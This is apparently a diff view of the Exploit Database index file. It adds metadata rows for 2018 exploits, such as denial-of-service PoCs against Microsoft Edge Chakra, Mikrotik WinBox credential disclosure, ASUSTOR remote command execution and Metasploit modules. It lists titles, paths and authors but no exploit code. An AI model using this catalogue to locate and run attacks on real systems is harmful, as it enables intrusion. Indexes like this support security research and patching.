45199,exploits/hardware/dos/45199.txt,"JioFi 4G M2S 1.0.2 - Denial of Service (PoC)",2018-08-15,"Vikas Chaudhary",dos,hardware,
|
||||
45203,exploits/hardware/dos/45203.txt,"TP-Link WR840N 0.9.1 3.16 - Denial of Service (PoC)",2018-08-16,"Aniket Dinda",dos,hardware,
|
||||
45203,exploits/hardware/dos/45203.txt,"TP-Link WR840N 0.9.1 3.16 - Denial of Service (PoC)",2018-08-16,"Aniket Dinda",dos,hardware,80
|
||||
45204,exploits/windows_x86-64/dos/45204.py,"ObserverIP Scan Tool 1.4.0.1 - Denial of Service (PoC)",2018-08-16,"Gionathan Reale",dos,windows_x86-64,
|
||||
45207,exploits/windows_x86-64/dos/45207.py,"Central Management Software 1.4.13 - Denial of Service (PoC)",2018-08-16,"Gionathan Reale",dos,windows_x86-64,
|
||||
45211,exploits/windows_x86-64/dos/45211.py,"CEWE Photoshow 6.3.4 - Denial of Service (PoC)",2018-08-17,"Gionathan Reale",dos,windows_x86-64,
|
||||
45213,exploits/windows/dos/45213.js,"Microsoft Edge Chakra JIT - ImplicitCallFlags Check Bypass with Intl",2018-08-17,"Google Security Research",dos,windows,
|
||||
45214,exploits/windows/dos/45214.js,"Microsoft Edge Chakra JIT - Scope Parsing Type Confusion",2018-08-17,"Google Security Research",dos,windows,
|
||||
45215,exploits/windows/dos/45215.js,"Microsoft Edge Chakra JIT - 'DictionaryPropertyDescriptor::CopyFrom' Type Confusion",2018-08-17,"Google Security Research",dos,windows,
|
||||
45216,exploits/windows/dos/45216.js,"Microsoft Edge Chakra JIT - 'InlineArrayPush' Type Confusion",2018-08-17,"Google Security Research",dos,windows,
|
||||
45217,exploits/windows/dos/45217.js,"Microsoft Edge Chakra JIT - InitializeNumberFormat and InitializeDateTimeFormat Type Confusion",2018-08-17,"Google Security Research",dos,windows,
|
||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
||||
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
||||
|
@ -16693,6 +16699,7 @@ id,file,description,date,author,type,platform,port
|
|||
45170,exploits/windows/remote/45170.py,"Mikrotik WinBox 6.42 - Credential Disclosure (Metasploit)",2018-08-09,"Omid Shojaei",remote,windows,
|
||||
45193,exploits/windows/remote/45193.rb,"Oracle Weblogic Server - Deserialization Remote Code Execution (Metasploit)",2018-08-13,Metasploit,remote,windows,7001
|
||||
45197,exploits/windows_x86-64/remote/45197.rb,"Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit)",2018-08-14,"Raymond Wellnitz",remote,windows_x86-64,
|
||||
45210,exploits/linux/remote/45210.py,"OpenSSH 2.3 < 7.4 - Username Enumeration (PoC)",2018-08-16,"Matthew Daley",remote,linux,
|
||||
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||
|
@ -39764,6 +39771,7 @@ id,file,description,date,author,type,platform,port
|
|||
45125,exploits/php/webapps/45125.txt,"Auditor Website 2.0.1 - Cross-Site Scripting",2018-08-02,"Vikas Chaudhary",webapps,php,80
|
||||
45076,exploits/hardware/webapps/45076.py,"Davolink DVW 3200 Router - Password Disclosure",2018-07-23,"Ankit Anubhav",webapps,hardware,
|
||||
45078,exploits/hardware/webapps/45078.py,"Tenda Wireless N150 Router 5.07.50 - Cross-Site Request Forgery (Reboot Router)",2018-07-23,"Nathu Nandwani",webapps,hardware,80
|
||||
45209,exploits/hardware/webapps/45209.go,"Mikrotik WinBox 6.42 - Credential Disclosure (golang)",2018-08-17,"Maxim Yefimenko",webapps,hardware,
|
||||
45084,exploits/hardware/webapps/45084.txt,"D-link DAP-1360 - Path Traversal / Cross-Site Scripting",2018-07-24,r3m0t3nu11,webapps,hardware,80
|
||||
45088,exploits/hardware/webapps/45088.txt,"Trivum Multiroom Setup Tool 8.76 - Corss-Site Request Forgery (Admin Bypass)",2018-07-26,vulnc0d3,webapps,hardware,80
|
||||
45090,exploits/linux/webapps/45090.txt,"Kirby CMS 2.5.12 - Cross-Site Request Forgery (Delete Page)",2018-07-26,"Zaran Shaikh",webapps,linux,
|
||||
|
@ -39802,8 +39810,10 @@ id,file,description,date,author,type,platform,port
|
|||
45190,exploits/multiple/webapps/45190.txt,"IBM Sterling B2B Integrator 5.2.0.1/5.2.6.3 - Cross-Site Scripting",2018-08-13,"Vikas Khanna",webapps,multiple,
|
||||
45195,exploits/linux/webapps/45195.rb,"cgit 1.2.1 - Directory Traversal (Metasploit)",2018-08-14,"Dhiraj Mishra",webapps,linux,
|
||||
45196,exploits/windows/webapps/45196.rb,"Oracle GlassFish Server Open Source Edition 4.1 - Path Traversal (Metasploit)",2018-08-14,Metasploit,webapps,windows,4848
|
||||
45198,exploits/linux/webapps/45198.rb,"Oracle Glassfish OSE 4.1 - Path Traversal (Metasploit)",2018-08-14,"Dhiraj Mishra",webapps,linux,
|
||||
45200,exploits/cgi/webapps/45200.txt,"ASUSTOR ADM 3.1.0.RFQ3 - Remote Command Execution / SQL Injection",2018-08-15,"Kyle Lovett",webapps,cgi,8001
|
||||
45202,exploits/linux/webapps/45202.txt,"OpenEMR 5.0.1.3 - Arbitrary File Actions",2018-08-16,"Joshua Fam",webapps,linux,
|
||||
45201,exploits/hardware/webapps/45201.txt,"ASUS-DSL N10 1.1.2.2_17 - Authentication Bypass",2018-08-15,AmnBAN,webapps,hardware,
|
||||
45206,exploits/php/webapps/45206.txt,"Wordpress Plugin Export Users to CSV 1.1.1 - CSV Injection",2018-08-16,"Javier Olmedo",webapps,php,
|
||||
45206,exploits/php/webapps/45206.txt,"WordPress Plugin Export Users to CSV 1.1.1 - CSV Injection",2018-08-16,"Javier Olmedo",webapps,php,
|
||||
45208,exploits/php/webapps/45208.txt,"Pimcore 5.2.3 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2018-08-16,"SEC Consult",webapps,php,80
|
||||
45212,exploits/hardware/webapps/45212.py,"ADM 3.1.2RHG1 - Remote Code Execution",2018-08-17,"Matthew Fulton",webapps,hardware,443
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue